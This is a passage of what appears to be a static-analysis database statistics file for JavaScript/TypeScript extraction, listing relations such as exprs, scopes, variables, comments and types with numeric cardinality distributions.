+3748 + + + + + + +tostring +kind + + +12 + + +1 +2 +284895 + + +2 +4 +61 + + + + + + +tostring +parent + + +12 + + +1 +2 +195596 + + +2 +3 +45562 + + +3 +5 +23127 + + +5 +66340 +20671 + + + + + + +tostring +idx + + +12 + + +1 +2 +225945 + + +2 +3 +33948 + + +3 +13 +21496 + + +13 +903 +3567 + + + + + + + + +stmt_containers +1096691 + + +stmt +1096691 + + +container +120740 + + + + +stmt +container + + +12 + + +1 +2 +1096691 + + + + + + +container +stmt + + +12 + + +1 +2 +6778 + + +2 +3 +35010 + + +3 +4 +16178 + + +4 +5 +12184 + + +5 +6 +9476 + + +6 +7 +7569 + + +7 +9 +10084 + + +9 +13 +10057 + + +13 +27 +9196 + + +27 +152947 +4208 + + + + + + + + +jump_targets +11791 + + +jump +11791 + + +target +4873 + + + + +jump +target + + +12 + + +1 +2 +11791 + + + + + + +target +jump + + +12 + + +1 +2 +2542 + + +2 +3 +1106 + + +3 +4 +505 + + +4 +6 +410 + + +6 +260 +310 + + + + + + + + +exprs +id +5495305 + + +id +5495305 + + +kind +85 + + +parent +3130204 + + +idx +17698 + + +tostring +834491 + + + + +id +kind + + +12 + + +1 +2 +5495305 + + + + + + +id +parent + + +12 + + +1 +2 +5495305 + + + + + + +id +idx + + +12 + + +1 +2 +5495305 + + + + + + +id +tostring + + +12 + + +1 +2 +5495305 + + + + + + +kind +id + + +12 + + +1 +4 +7 + + +4 +45 +7 + + +50 +97 +7 + + +108 +458 +7 + + +503 +824 +7 + + +1135 +2497 +7 + + +2527 +5439 +7 + + +5655 +10255 +7 + + +10789 +15893 +7 + + +17758 +42854 +7 + + +50958 +130844 +7 + + +245084 +722374 +7 + + +1295408 +1295409 +1 + + + + + + +kind +parent + + +12 + + +1 +3 +7 + + +3 +45 +7 + + +47 +93 +7 + + +106 +407 +7 + + +457 +809 +7 + + +1108 +2420 +7 + + +2502 +5349 +7 + + +5453 +10133 +7 + + +10658 +15697 +7 + + +16273 +36888 +7 + + +41849 +128642 +7 + + +199566 +722374 +7 + + +1171898 +1171899 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +7 + + +2 +3 +12 + + +3 +4 +11 + + +4 +5 +7 + + +5 +6 +7 + + +6 +7 +3 + + +7 +8 +7 + + +8 +11 +6 + + +12 +18 +7 + + +20 +64 +7 + + +82 +395 +7 + + +431 +13375 +4 + + + + + + +kind +tostring + + +12 + + +1 +2 +7 + + +2 +6 +7 + + +8 +37 +7 + + +38 +126 +7 + + +142 +304 +7 + + +358 +721 +7 + + +811 +1485 +7 + + +1523 +2918 +7 + + +3305 +5078 +7 + + +5422 +9940 +7 + + +10536 +40606 +7 + + +46227 +123090 +7 + + +128754 +128755 +1 + + + + + + +parent +id + + +12 + + +1 +2 +1100280 + + +2 +3 +1876078 + + +3 +17692 +153846 + + + + + + +parent +kind + + +12 + + +1 +2 +1300246 + + +2 +3 +1747609 + + +3 +8 +82349 + + + + + + +parent +idx + + +12 + + +1 +2 +1100280 + + +2 +3 +1876078 + + +3 +17692 +153846 + + + + + + +parent +tostring + + +12 + + +1 +2 +1108803 + + +2 +3 +1870864 + + +3 +17526 +150537 + + + + + + +idx +id + + +12 + + +1 +2 +4092 + + +2 +3 +1365 + + +3 +4 +1995 + + +4 +5 +283 + + +5 +6 +1681 + + +6 +7 +5909 + + +7 +10 +1344 + + +10 +3049605 +1029 + + + + + + +idx +kind + + +12 + + +1 +2 +10648 + + +2 +3 +6398 + + +3 +83 +652 + + + + + + +idx +parent + + +12 + + +1 +2 +4092 + + +2 +3 +1365 + + +3 +4 +1995 + + +4 +5 +283 + + +5 +6 +1681 + + +6 +7 +5909 + + +7 +10 +1344 + + +10 +3049605 +1029 + + + + + + +idx +tostring + + +12 + + +1 +2 +4093 + + +2 +3 +1365 + + +3 +4 +2014 + + +4 +5 +1147 + + +5 +6 +1529 + + +6 +7 +5401 + + +7 +10 +1499 + + +10 +573348 +650 + + + + + + +tostring +id + + +12 + + +1 +2 +466570 + + +2 +3 +157949 + + +3 +4 +55443 + + +4 +6 +61411 + + +6 +17 +63412 + + +17 +128652 +29706 + + + + + + +tostring +kind + + +12 + + +1 +2 +772624 + + +2 +24 +61867 + + + + + + +tostring +parent + + +12 + + +1 +2 +467110 + + +2 +3 +158201 + + +3 +4 +55446 + + +4 +6 +61061 + + +6 +17 +63168 + + +17 +128642 +29505 + + + + + + +tostring +idx + + +12 + + +1 +2 +724438 + + +2 +3 +86524 + + +3 +7765 +23529 + + + + + + + + +literals +expr +3145090 + + +value +216517 + + +raw +234110 + + +expr +3145090 + + + + +value +raw + + +12 + + +1 +2 +201221 + + +2 +25 +15296 + + + + + + +value +expr + + +12 + + +1 +2 +95821 + + +2 +3 +41222 + + +3 +4 +19627 + + +4 +5 +16097 + + +5 +9 +18825 + + +9 +31 +16474 + + +31 +122435 +8451 + + + + + + +raw +value + + +12 + + +1 +2 +234110 + + + + + + +raw +expr + + +12 + + +1 +2 +104635 + + +2 +3 +47230 + + +3 +4 +20082 + + +4 +5 +16835 + + +5 +9 +19610 + + +9 +34 +17695 + + +34 +120241 +8023 + + + + + + +expr +value + + +12 + + +1 +2 +3145090 + + + + + + +expr +raw + + +12 + + +1 +2 +3145090 + + + + + + + + +enclosing_stmt +5372899 + + +expr +5372899 + + +stmt +854574 + + + + +expr +stmt + + +12 + + +1 +2 +5372899 + + + + + + +stmt +expr + + +12 + + +1 +3 +74578 + + +3 +4 +254844 + + +4 +5 +57228 + + +5 +6 +136234 + + +6 +7 +44557 + + +7 +8 +79401 + + +8 +9 +55420 + + +9 +11 +63155 + + +11 +17 +65146 + + +17 +88321 +24011 + + + + + + + + +expr_containers +5495305 + + +expr +5495305 + + +container +118511 + + + + +expr +container + + +12 + + +1 +2 +5495305 + + + + + + +container +expr + + +12 + + +1 +4 +7197 + + +4 +6 +9110 + + +6 +8 +9222 + + +8 +10 +8424 + + +10 +13 +10651 + + +13 +16 +8706 + + +16 +20 +9358 + + +20 +25 +9955 + + +25 +31 +8893 + + +31 +40 +9356 + + +40 +54 +9017 + + +54 +85 +8935 + + +85 +484 +8890 + + +484 +459128 +797 + + + + + + + + +array_size +28188 + + +ae +28188 + + +sz +118 + + + + +ae +sz + + +12 + + +1 +2 +28188 + + + + + + +sz +ae + + +12 + + +1 +2 +52 + + +2 +3 +21 + + +3 +5 +9 + + +5 +8 +9 + + +9 +20 +9 + + +22 +181 +9 + + +231 +12345 +9 + + + + + + + + +is_delegating +4 + + +yield +4 + + + + + +expr_contains_template_tag_location +31 + + +expr +31 + + +location +31 + + + + +expr +location + + +12 + + +1 +2 +31 + + + + + + +location +expr + + +12 + + +1 +2 +31 + + + + + + + + +template_placeholder_tag_info +283 + + +node +283 + + +parentNode +92 + + +raw +24 + + + + +node +parentNode + + +12 + + +1 +2 +283 + + + + + + +node +raw + + +12 + + +1 +2 +283 + + + + + + +parentNode +node + + +12 + + +1 +2 +49 + + +2 +3 +4 + + +3 +4 +9 + + +5 +6 +9 + + +6 +7 +4 + + +7 +8 +13 + + +9 +11 +4 + + + + + + +parentNode +raw + + +12 + + +1 +2 +49 + + +2 +3 +4 + + +3 +4 +9 + + +4 +5 +11 + + +5 +6 +13 + + +6 +11 +6 + + + + + + +raw +node + + +12 + + +1 +2 +2 + + +2 +3 +4 + + +3 +4 +9 + + +4 +6 +2 + + +16 +17 +2 + + +20 +26 +2 + + +34 +45 +2 + + +82 +83 +1 + + + + + + +raw +parentNode + + +12 + + +1 +2 +2 + + +2 +3 +4 + + +3 +4 +9 + + +4 +6 +2 + + +16 +17 +2 + + +20 +26 +2 + + +34 +41 +2 + + +44 +45 +1 + + + + + + + + +scopes +id +118172 + + +id +118172 + + +kind +8 + + + + +id +kind + + +12 + + +1 +2 +118172 + + + + + + +kind +id + + +12 + + +1 +2 +1 + + +4 +5 +1 + + +17 +18 +1 + + +21 +22 +1 + + +28 +29 +1 + + +584 +585 +1 + + +1272 +1273 +1 + + +116245 +116246 +1 + + + + + + + + +scopenodes +118171 + + +node +118171 + + +scope +118171 + + + + +node +scope + + +12 + + +1 +2 +118171 + + + + + + +scope +node + + +12 + + +1 +2 +118171 + + + + + + + + +scopenesting +118171 + + +inner +118171 + + +outer +33143 + + + + +inner +outer + + +12 + + +1 +2 +118171 + + + + + + +outer +inner + + +12 + + +1 +2 +17868 + + +2 +3 +6196 + + +3 +4 +2666 + + +4 +6 +2791 + + +6 +13 +2584 + + +13 +17277 +1038 + + + + + + + + +is_generator +62 + + +fun +62 + + + + + +has_rest_parameter +33 + + +fun +33 + + + + + +is_async +50 + + +fun +50 + + + + + +variables +id +364388 + + +id +364388 + + +name +56559 + + +scope +118168 + + + + +id +name + + +12 + + +1 +2 +364388 + + + + + + +id +scope + + +12 + + +1 +2 +364388 + + + + + + +name +id + + +12 + + +1 +2 +38013 + + +2 +3 +9547 + + +3 +5 +4518 + + +5 +115 +4242 + + +115 +116259 +239 + + + + + + +name +scope + + +12 + + +1 +2 +38013 + + +2 +3 +9547 + + +3 +5 +4518 + + +5 +115 +4242 + + +115 +116259 +239 + + + + + + +scope +id + + +12 + + +1 +2 +39907 + + +2 +3 +32053 + + +3 +4 +18882 + + +4 +5 +9814 + + +5 +8 +10909 + + +8 +8779 +6603 + + + + + + +scope +name + + +12 + + +1 +2 +39907 + + +2 +3 +32053 + + +3 +4 +18882 + + +4 +5 +9814 + + +5 +8 +10909 + + +8 +8779 +6603 + + + + + + + + +local_type_names +23565 + + +id +23565 + + +name +6080 + + +scope +1614 + + + + +id +name + + +12 + + +1 +2 +23565 + + + + + + +id +scope + + +12 + + +1 +2 +23565 + + + + + + +name +id + + +12 + + +1 +2 +2821 + + +2 +3 +1362 + + +3 +4 +641 + + +4 +6 +508 + + +6 +13 +485 + + +13 +533 +263 + + + + + + +name +scope + + +12 + + +1 +2 +2821 + + +2 +3 +1362 + + +3 +4 +641 + + +4 +6 +508 + + +6 +13 +485 + + +13 +533 +263 + + + + + + +scope +id + + +12 + + +1 +2 +138 + + +2 +3 +109 + + +3 +4 +116 + + +4 +5 +108 + + +5 +7 +140 + + +7 +8 +89 + + +8 +10 +131 + + +10 +12 +112 + + +12 +15 +144 + + +15 +19 +134 + + +19 +25 +132 + + +25 +37 +122 + + +37 +87 +122 + + +87 +221 +17 + + + + + + +scope +name + + +12 + + +1 +2 +138 + + +2 +3 +109 + + +3 +4 +116 + + +4 +5 +108 + + +5 +7 +140 + + +7 +8 +89 + + +8 +10 +131 + + +10 +12 +112 + + +12 +15 +144 + + +15 +19 +134 + + +19 +25 +132 + + +25 +37 +122 + + +37 +87 +122 + + +87 +221 +17 + + + + + + + + +local_namespace_names +20832 + + +id +20832 + + +name +4078 + + +scope +1543 + + + + +id +name + + +12 + + +1 +2 +20832 + + + + + + +id +scope + + +12 + + +1 +2 +20832 + + + + + + +name +id + + +12 + + +1 +2 +1787 + + +2 +3 +859 + + +3 +4 +378 + + +4 +5 +216 + + +5 +8 +364 + + +8 +20 +310 + + +20 +533 +164 + + + + + + +name +scope + + +12 + + +1 +2 +1787 + + +2 +3 +859 + + +3 +4 +378 + + +4 +5 +216 + + +5 +8 +364 + + +8 +20 +310 + + +20 +533 +164 + + + + + + +scope +id + + +12 + + +1 +2 +88 + + +2 +3 +123 + + +3 +4 +120 + + +4 +5 +104 + + +5 +6 +107 + + +6 +7 +70 + + +7 +8 +87 + + +8 +10 +137 + + +10 +12 +122 + + +12 +15 +122 + + +15 +19 +124 + + +19 +26 +120 + + +26 +39 +117 + + +39 +136 +102 + + + + + + +scope +name + + +12 + + +1 +2 +88 + + +2 +3 +123 + + +3 +4 +120 + + +4 +5 +104 + + +5 +6 +107 + + +6 +7 +70 + + +7 +8 +87 + + +8 +10 +137 + + +10 +12 +122 + + +12 +15 +122 + + +15 +19 +124 + + +19 +26 +120 + + +26 +39 +117 + + +39 +136 +102 + + + + + + + + +is_arguments_object +116243 + + +id +116243 + + + + + +bind +1295408 + + +id +1295408 + + +decl +224900 + + + + +id +decl + + +12 + + +1 +2 +1295408 + + + + + + +decl +id + + +12 + + +1 +2 +81789 + + +2 +3 +50824 + + +3 +4 +29919 + + +4 +5 +17755 + + +5 +7 +16901 + + +7 +14 +17790 + + +14 +98305 +9922 + + + + + + + + +decl +250257 + + +id +250257 + + +decl +246998 + + + + +id +decl + + +12 + + +1 +2 +250257 + + + + + + +decl +id + + +12 + + +1 +2 +245772 + + +2 +283 +1226 + + + + + + + + +typebind +36216 + + +id +36216 + + +decl +12650 + + + + +id +decl + + +12 + + +1 +2 +36216 + + + + + + +decl +id + + +12 + + +1 +2 +6781 + + +2 +3 +2435 + + +3 +4 +1133 + + +4 +6 +1127 + + +6 +17 +954 + + +17 +524 +220 + + + + + + + + +typedecl +23573 + + +id +23573 + + +decl +23565 + + + + +id +decl + + +12 + + +1 +2 +23573 + + + + + + +decl +id + + +12 + + +1 +2 +23558 + + +2 +4 +7 + + + + + + + + +namespacedecl +20839 + + +id +20839 + + +decl +20832 + + + + +id +decl + + +12 + + +1 +2 +20839 + + + + + + +decl +id + + +12 + + +1 +2 +20828 + + +2 +5 +4 + + + + + + + + +namespacebind +4300 + + +id +4300 + + +decl +485 + + + + +id +decl + + +12 + + +1 +2 +4300 + + + + + + +decl +id + + +12 + + +1 +2 +133 + + +2 +3 +46 + + +3 +4 +56 + + +4 +5 +30 + + +5 +7 +37 + + +7 +9 +44 + + +9 +12 +41 + + +12 +17 +38 + + +17 +31 +37 + + +32 +287 +23 + + + + + + + + +properties +id +142723 + + +id +142723 + + +parent +45129 + + +index +4204 + + +kind +3 + + +tostring +67703 + + + + +id +parent + + +12 + + +1 +2 +142723 + + + + + + +id +index + + +12 + + +1 +2 +142723 + + + + + + +id +kind + + +12 + + +1 +2 +142723 + + + + + + +id +tostring + + +12 + + +1 +2 +142723 + + + + + + +parent +id + + +12 + + +1 +2 +15702 + + +2 +3 +17715 + + +3 +4 +4729 + + +4 +6 +3778 + + +6 +4205 +3205 + + + + + + +parent +index + + +12 + + +1 +2 +15702 + + +2 +3 +17715 + + +3 +4 +4729 + + +4 +6 +3778 + + +6 +4205 +3205 + + + + + + +parent +kind + + +12 + + +1 +2 +44603 + + +2 +4 +526 + + + + + + +parent +tostring + + +12 + + +1 +2 +15770 + + +2 +3 +17763 + + +3 +4 +4692 + + +4 +6 +3759 + + +6 +4173 +3145 + + + + + + +index +id + + +12 + + +2 +3 +2827 + + +3 +4 +364 + + +4 +6 +358 + + +6 +8 +337 + + +8 +11713 +316 + + +29427 +45130 +2 + + + + + + +index +parent + + +12 + + +2 +3 +2827 + + +3 +4 +364 + + +4 +6 +358 + + +6 +8 +337 + + +8 +11713 +316 + + +29427 +45130 +2 + + + + + + +index +kind + + +12 + + +1 +2 +4149 + + +2 +4 +55 + + + + + + +index +tostring + + +12 + + +1 +2 +2827 + + +2 +3 +364 + + +3 +5 +358 + + +5 +7 +337 + + +7 +6233 +316 + + +16744 +16747 +2 + + + + + + +kind +id + + +12 + + +338 +339 +1 + + +1529 +1530 +1 + + +140856 +140857 +1 + + + + + + +kind +parent + + +12 + + +204 +205 +1 + + +523 +524 +1 + + +45034 +45035 +1 + + + + + + +kind +index + + +12 + + +36 +37 +1 + + +55 +56 +1 + + +4204 +4205 +1 + + + + + + +kind +tostring + + +12 + + +174 +175 +1 + + +880 +881 +1 + + +66649 +66650 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +46301 + + +2 +3 +13295 + + +3 +6 +5112 + + +6 +2975 +2995 + + + + + + +tostring +parent + + +12 + + +1 +2 +46926 + + +2 +3 +13013 + + +3 +7 +5466 + + +7 +2975 +2298 + + + + + + +tostring +index + + +12 + + +1 +2 +61480 + + +2 +4 +5275 + + +4 +43 +948 + + + + + + +tostring +kind + + +12 + + +1 +2 +67703 + + + + + + + + +is_computed +27 + + +id +27 + + + + + +is_method +392 + + +id +392 + + + + + +is_static +36 + + +id +36 + + + + + +type_alias +1386 + + +aliasType +1386 + + +underlyingType +1361 + + + + +underlyingType +aliasType + + +12 + + +1 +2 +1 + + + + + + +aliasType +underlyingType + + +12 + + +1 +2 +1 + + + + + + + + +type_literal_value +31882 + + +typ +31882 + + +value +31828 + + + + +typ +value + + +12 + + +1 +2 +31882 + + + + + + +value +typ + + +12 + + +1 +2 +31774 + + +2 +3 +54 + + + + + + + + +signature_types +46921 + + +id +46921 + + +kind +2 + + +tostring +27460 + + +type_parameters +11 + + +required_params +22 + + + + +id +kind + + +12 + + +1 +2 +46921 + + + + + + +id +tostring + + +12 + + +1 +2 +46921 + + + + + + +id +type_parameters + + +12 + + +1 +2 +46921 + + + + + + +id +required_params + + +12 + + +1 +2 +46921 + + + + + + +kind +id + + +12 + + +2639 +2640 +1 + + +44282 +44283 +1 + + + + + + +kind +tostring + + +12 + + +2200 +2201 +1 + + +25260 +25261 +1 + + + + + + +kind +type_parameters + + +12 + + +4 +5 +1 + + +11 +12 +1 + + + + + + +kind +required_params + + +12 + + +18 +19 +1 + + +19 +20 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +22069 + + +2 +3 +3061 + + +3 +13 +2112 + + +13 +277 +218 + + + + + + +tostring +kind + + +12 + + +1 +2 +27460 + + + + + + +tostring +type_parameters + + +12 + + +1 +2 +27459 + + +2 +3 +1 + + + + + + +tostring +required_params + + +12 + + +1 +2 +27134 + + +2 +10 +326 + + + + + + +type_parameters +id + + +12 + + +1 +2 +1 + + +13 +14 +1 + + +25 +26 +1 + + +34 +35 +1 + + +42 +43 +1 + + +51 +52 +1 + + +74 +75 +1 + + +139 +140 +1 + + +274 +275 +1 + + +5367 +5368 +1 + + +40901 +40902 +1 + + + + + + +type_parameters +kind + + +12 + + +1 +2 +7 + + +2 +3 +4 + + + + + + +type_parameters +tostring + + +12 + + +1 +2 +1 + + +5 +6 +1 + + +6 +7 +2 + + +8 +9 +2 + + +17 +18 +1 + + +18 +19 +1 + + +158 +159 +1 + + +1805 +1806 +1 + + +25429 +25430 +1 + + + + + + +type_parameters +required_params + + +12 + + +1 +2 +1 + + +3 +4 +1 + + +4 +5 +1 + + +5 +6 +1 + + +6 +7 +2 + + +7 +8 +1 + + +8 +9 +2 + + +9 +10 +1 + + +22 +23 +1 + + + + + + +required_params +id + + +12 + + +1 +2 +4 + + +2 +3 +2 + + +3 +5 +2 + + +5 +11 +2 + + +11 +12 +2 + + +44 +131 +2 + + +197 +373 +2 + + +645 +2439 +2 + + +2783 +6853 +2 + + +16407 +17002 +2 + + + + + + +required_params +kind + + +12 + + +1 +2 +7 + + +2 +3 +15 + + + + + + +required_params +tostring + + +12 + + +1 +2 +4 + + +2 +3 +3 + + +4 +5 +1 + + +5 +6 +2 + + +9 +12 +2 + + +39 +62 +2 + + +112 +205 +2 + + +432 +1404 +2 + + +1813 +3662 +2 + + +8431 +11659 +2 + + + + + + +required_params +type_parameters + + +12 + + +1 +2 +12 + + +2 +3 +1 + + +3 +4 +2 + + +5 +7 +2 + + +8 +10 +2 + + +10 +11 +2 + + +11 +12 +1 + + + + + + + + +is_abstract_signature +12 + + +sig +12 + + + + + +signature_rest_parameter +19521 + + +sig +19521 + + +rest_param_arra_type +14259 + + + + +rest_param_arra_type +sig + + +12 + + +1 +2 +1 + + + + + + +sig +rest_param_arra_type + + +12 + + +1 +2 +1 + + + + + + + + +type_contains_signature +87640 + + +typ +68964 + + +kind +2 + + +index +247 + + +sig +37344 + + + + +typ +kind + + +12 + + +1 +2 +68938 + + +2 +3 +26 + + + + + + +typ +index + + +12 + + +1 +2 +59150 + + +2 +3 +5394 + + +3 +248 +4420 + + + + + + +typ +sig + + +12 + + +1 +2 +60034 + + +2 +3 +4557 + + +3 +248 +4373 + + + + + + +kind +typ + + +12 + + +2582 +2583 +1 + + +66408 +66409 +1 + + + + + + +kind +index + + +12 + + +6 +7 +1 + + +247 +248 +1 + + + + + + +kind +sig + + +12 + + +2646 +2647 +1 + + +34698 +34699 +1 + + + + + + +index +typ + + +12 + + +1 +2 +198 + + +2 +3 +21 + + +3 +265 +19 + + +449 +42171 +9 + + + + + + +index +kind + + +12 + + +1 +2 +241 + + +2 +3 +6 + + + + + + +index +sig + + +12 + + +1 +2 +198 + + +2 +3 +24 + + +3 +90 +19 + + +309 +31688 +6 + + + + + + +sig +typ + + +12 + + +1 +2 +35114 + + +2 +896 +2230 + + + + + + +sig +kind + + +12 + + +1 +2 +37344 + + + + + + +sig +index + + +12 + + +1 +2 +36489 + + +2 +9 +855 + + + + + + + + +signature_contains_type +107012 + + +child +26824 + + +parent +37344 + + +index +21 + + + + +child +parent + + +12 + + +1 +2 +19848 + + +2 +3 +3736 + + +3 +7 +2017 + + +7 +10275 +1223 + + + + + + +child +index + + +12 + + +1 +2 +22572 + + +2 +3 +3289 + + +3 +22 +963 + + + + + + +parent +child + + +12 + + +1 +2 +3594 + + +2 +3 +18463 + + +3 +4 +10057 + + +4 +5 +3906 + + +5 +11 +1324 + + + + + + +parent +index + + +12 + + +1 +2 +2649 + + +2 +3 +14810 + + +3 +4 +12007 + + +4 +5 +4294 + + +5 +8 +3055 + + +8 +22 +529 + + + + + + +index +child + + +12 + + +1 +2 +2 + + +2 +3 +6 + + +3 +4 +1 + + +5 +6 +1 + + +9 +10 +1 + + +18 +19 +1 + + +106 +107 +1 + + +313 +314 +1 + + +455 +456 +1 + + +643 +644 +1 + + +1088 +1089 +1 + + +2051 +2052 +1 + + +6862 +6863 +1 + + +8789 +8790 +1 + + +12289 +12290 +1 + + + + + + +index +parent + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +2 + + +5 +6 +1 + + +6 +7 +1 + + +17 +18 +1 + + +22 +23 +1 + + +26 +27 +1 + + +37 +38 +1 + + +45 +46 +1 + + +91 +92 +1 + + +219 +220 +1 + + +529 +530 +1 + + +1042 +1043 +1 + + +1574 +1575 +1 + + +3584 +3585 +1 + + +7878 +7879 +1 + + +19885 +19886 +1 + + +34695 +34696 +1 + + +37344 +37345 +1 + + + + + + + + +signature_parameter_name +69668 + + +sig +34695 + + +index +20 + + +name +4071 + + + + +sig +index + + +12 + + +1 +2 +14810 + + +2 +3 +12007 + + +3 +4 +4294 + + +4 +7 +3055 + + +7 +21 +529 + + + + + + +sig +name + + +12 + + +1 +2 +14810 + + +2 +3 +12007 + + +3 +4 +4294 + + +4 +7 +3055 + + +7 +21 +529 + + + + + + +index +sig + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +2 + + +5 +6 +1 + + +6 +7 +1 + + +17 +18 +1 + + +22 +23 +1 + + +26 +27 +1 + + +37 +38 +1 + + +45 +46 +1 + + +91 +92 +1 + + +219 +220 +1 + + +529 +530 +1 + + +1042 +1043 +1 + + +1574 +1575 +1 + + +3584 +3585 +1 + + +7878 +7879 +1 + + +19885 +19886 +1 + + +34695 +34696 +1 + + + + + + +index +name + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +2 + + +5 +6 +2 + + +11 +12 +1 + + +16 +17 +1 + + +18 +19 +1 + + +24 +25 +1 + + +30 +31 +1 + + +45 +46 +1 + + +63 +64 +1 + + +116 +117 +1 + + +188 +189 +1 + + +344 +345 +1 + + +605 +606 +1 + + +1092 +1093 +1 + + +1741 +1742 +1 + + +2122 +2123 +1 + + + + + + +name +sig + + +12 + + +1 +2 +1898 + + +2 +3 +700 + + +3 +4 +294 + + +4 +5 +262 + + +5 +8 +310 + + +8 +24 +309 + + +24 +3588 +298 + + + + + + +name +index + + +12 + + +1 +2 +2804 + + +2 +3 +738 + + +3 +4 +290 + + +4 +15 +239 + + + + + + + + +number_index_type +2038 + + +baseType +2038 + + +propertyType +517 + + + + +baseType +propertyType + + +12 + + +1 +2 +2038 + + + + + + +propertyType +baseType + + +12 + + +1 +2 +435 + + +2 +3 +70 + + +3 +1259 +12 + + + + + + + + +string_index_type +1102 + + +baseType +1102 + + +propertyType +256 + + + + +baseType +propertyType + + +12 + + +1 +2 +1102 + + + + + + +propertyType +baseType + + +12 + + +1 +2 +219 + + +2 +3 +20 + + +3 +436 +17 + + + + + + + + +base_type_names +941 + + +typeName +928 + + +baseTypeName +369 + + + + +typeName +baseTypeName + + +12 + + +1 +2 +917 + + +2 +4 +11 + + + + + + +baseTypeName +typeName + + +12 + + +1 +2 +175 + + +2 +3 +101 + + +3 +4 +29 + + +4 +5 +29 + + +5 +11 +28 + + +15 +41 +7 + + + + + + + + +self_types +19632 + + +typeName +14119 + + +selfType +19632 + + + + +typeName +selfType + + +12 + + +1 +2 +10451 + + +2 +3 +1823 + + +3 +4 +1845 + + + + + + +selfType +typeName + + +12 + + +1 +2 +19632 + + + + + + + + +tuple_type_min_length +241 + + +typ +241 + + +minLength +10 + + + + +typ +minLength + + +12 + + +1 +2 +241 + + + + + + +minLength +typ + + +12 + + +2 +3 +3 + + +3 +4 +1 + + +4 +5 +1 + + +7 +8 +1 + + +20 +21 +1 + + +42 +43 +1 + + +66 +67 +1 + + +93 +94 +1 + + + + + + + + +tuple_type_rest_index +6 + + +typ +6 + + +index +2 + + + + +typ +index + + +12 + + +1 +2 +6 + + + + + + +index +typ + + +12 + + +1 +2 +1 + + +5 +6 +1 + + + + + + + + +comments +id +104947 + + +id +104947 + + +kind +5 + + +toplevel +4497 + + +text +73454 + + +tostring +57955 + + + + +id +kind + + +12 + + +1 +2 +104947 + + + + + + +id +toplevel + + +12 + + +1 +2 +104947 + + + + + + +id +text + + +12 + + +1 +2 +104947 + + + + + + +id +tostring + + +12 + + +1 +2 +104947 + + + + + + +kind +id + + +12 + + +1 +2 +2 + + +8834 +8835 +1 + + +19270 +19271 +1 + + +76841 +76842 +1 + + + + + + +kind +toplevel + + +12 + + +1 +2 +2 + + +1705 +1706 +1 + + +3107 +3108 +1 + + +3141 +3142 +1 + + + + + + +kind +text + + +12 + + +1 +2 +2 + + +4893 +4894 +1 + + +12759 +12760 +1 + + +55810 +55811 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +2 + + +1739 +1740 +1 + + +2536 +2537 +1 + + +53678 +53679 +1 + + + + + + +toplevel +id + + +12 + + +1 +2 +1034 + + +2 +3 +512 + + +3 +4 +332 + + +4 +5 +260 + + +5 +7 +388 + + +7 +10 +401 + + +10 +14 +354 + + +14 +21 +365 + + +21 +36 +338 + + +36 +99 +339 + + +99 +6350 +174 + + + + + + +toplevel +kind + + +12 + + +1 +2 +1856 + + +2 +3 +1824 + + +3 +4 +817 + + + + + + +toplevel +text + + +12 + + +1 +2 +1043 + + +2 +3 +533 + + +3 +4 +341 + + +4 +5 +266 + + +5 +7 +396 + + +7 +9 +315 + + +9 +13 +388 + + +13 +20 +385 + + +20 +35 +344 + + +35 +103 +344 + + +103 +4413 +142 + + + + + + +toplevel +tostring + + +12 + + +1 +2 +1054 + + +2 +3 +571 + + +3 +4 +374 + + +4 +5 +297 + + +5 +6 +232 + + +6 +8 +363 + + +8 +11 +345 + + +11 +16 +366 + + +16 +27 +352 + + +27 +60 +338 + + +60 +4394 +205 + + + + + + +text +id + + +12 + + +1 +2 +59626 + + +2 +3 +10314 + + +3 +1417 +3514 + + + + + + +text +kind + + +12 + + +1 +2 +73446 + + +2 +5 +8 + + + + + + +text +toplevel + + +12 + + +1 +2 +62696 + + +2 +3 +8455 + + +3 +257 +2303 + + + + + + +text +tostring + + +12 + + +1 +2 +73446 + + +2 +5 +8 + + + + + + +tostring +id + + +12 + + +1 +2 +44781 + + +2 +3 +9203 + + +3 +4589 +3971 + + + + + + +tostring +kind + + +12 + + +1 +2 +57955 + + + + + + +tostring +toplevel + + +12 + + +1 +2 +48252 + + +2 +3 +7233 + + +3 +513 +2470 + + + + + + +tostring +text + + +12 + + +1 +2 +55262 + + +2 +3403 +2693 + + + + + + + + +types +179398 + + +id +179398 + + +kind +9 + + +tostring +40918 + + + + +id +kind + + +12 + + +1 +2 +179398 + + + + + + +id +tostring + + +12 + + +1 +2 +179398 + + + + + + +kind +id + + +12 + + +1 +2 +5 + + +1802 +1803 +1 + + +6109 +6110 +1 + + +12383 +12384 +1 + + +159099 +159100 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +5 + + +50 +51 +1 + + +745 +746 +1 + + +7464 +7465 +1 + + +32936 +32937 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +22482 + + +2 +3 +8025 + + +3 +4 +3362 + + +4 +7 +3387 + + +7 +33 +3070 + + +33 +7284 +592 + + + + + + +tostring +kind + + +12 + + +1 +2 +40638 + + +2 +4 +280 + + + + + + + + +type_child +17410 + + +child +9118 + + +parent +7772 + + +idx +296 + + + + +child +parent + + +12 + + +1 +2 +7113 + + +2 +3 +978 + + +3 +8 +686 + + +8 +199 +341 + + + + + + +child +idx + + +12 + + +1 +2 +8255 + + +2 +5 +726 + + +5 +19 +137 + + + + + + +parent +child + + +12 + + +1 +2 +5433 + + +2 +3 +1746 + + +3 +288 +583 + + +288 +297 +10 + + + + + + +parent +idx + + +12 + + +1 +2 +5422 + + +2 +3 +1757 + + +3 +288 +583 + + +288 +297 +10 + + + + + + +idx +child + + +12 + + +1 +2 +1 + + +2 +3 +39 + + +3 +4 +3 + + +4 +5 +61 + + +5 +6 +37 + + +6 +7 +56 + + +7 +12 +22 + + +12 +14 +18 + + +14 +15 +44 + + +17 +6068 +15 + + + + + + +idx +parent + + +12 + + +2 +15 +13 + + +15 +16 +90 + + +19 +20 +81 + + +20 +23 +3 + + +23 +24 +75 + + +24 +55 +23 + + +55 +7773 +11 + + + + + + + + +ast_node_type +1261889 + + +node +1261889 + + +typ +72602 + + + + +node +typ + + +12 + + +1 +2 +1261889 + + + + + + +typ +node + + +12 + + +1 +2 +39248 + + +2 +3 +8371 + + +3 +4 +7888 + + +4 +5 +3053 + + +5 +8 +6417 + + 